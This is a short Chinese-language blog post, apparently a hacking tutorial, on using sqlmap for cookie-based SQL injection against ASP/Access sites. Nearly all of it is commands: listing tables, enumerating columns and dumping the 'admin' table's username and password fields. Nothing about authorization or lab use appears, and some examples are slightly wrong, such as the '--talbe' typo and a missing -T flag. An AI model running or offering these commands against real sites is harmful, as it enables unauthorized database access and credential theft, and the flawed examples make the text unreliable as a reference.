sqlmap:Cookie中转注入

固若金汤 (2258) 2023-12-21 15:55:06

注:此方法使用于access数据库,mysql、MSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysql、MSSQL注入一样,只不过在后面加上了“--level 2”这个参数,其他参数照常使用。

判断数据库,获取服务器,网站环境等参数
sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --table --level 2

例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --talbe --level 2

获取字段
sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --columns -T 数据表 --level 2

例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --columns -T admin --level 2

获取字段中的内容
sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --dump -T 表名 -C "字段名1,字段名2"  --level 2

例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --dump admin -C "username,password" --level 2
THE END

发表评论